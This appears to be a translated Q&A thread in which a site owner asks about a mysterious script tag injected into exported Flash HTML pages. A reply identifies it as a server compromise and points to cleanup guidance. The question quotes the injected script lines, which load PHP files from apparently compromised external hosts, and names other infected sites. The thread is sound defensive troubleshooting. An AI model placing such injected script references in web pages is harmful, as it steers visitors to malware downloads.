0

1 人の友人が、Flash CS6 エディタがエクスポートコマンドで提案するすべてのhtml パッケージを使用して、 Flashファイルを私のサーバーにアップロードしています。

さて、Flash に関するさまざまな議論にもかかわらず、問題は、最終的に非常に奇妙なスクリプト参照がhead要素に表示されることです。

<!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://techmounting.com.au/KsEsFOFC.php" type="text/javascript"></script><!--/339810-->

このスクリプト参照は元のhtmlファイルにはありません..これはウイルスのにおいがしますが、Google 全体で参照が見つかりません..友人のコンピューターやサーバーにウイルスがあるかどうかはわかりません。 .

何か案が?

別の例(私のサーバーにはありません)

http://www.iu-jaen.es (ブラウザでアクセスしないでください)

http://www.alliedcarehomehealth.com (ブラウザでアクセスしないでください)

<script type="text/javascript">var gwloaded = false;</script>
<script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>
4

1 に答える 1

1

Web サーバーが侵害されました。TL;DR あなたの Web サイトは、アクセスしているユーザーに対してコンテンツ ブロック インタースティシャルを表示し、疑わしいバイナリ ダウンロードに誘導します。セキュリティ違反の原因は不明ですが、関連するパスワードをリセットし、PHP/javascript ファイルで疑わしいコード スニペットを探すという通常の予防措置を講じます。

Google には、サイトをクリーンアップするために実行できるいくつかの手順 (サード パーティのプラグインの更新、PW の変更など) の優れた概要もあります。

https://support.google.com/webmasters/answer/163634

この攻撃の動作の概要については、WebSense からのこのセキュリティ投稿を参照してください。

http://community.websense.com/blogs/securitylabs/archive/tags/Mass+Injection/default.aspx

于 2013-11-13T16:33:18.520 に答える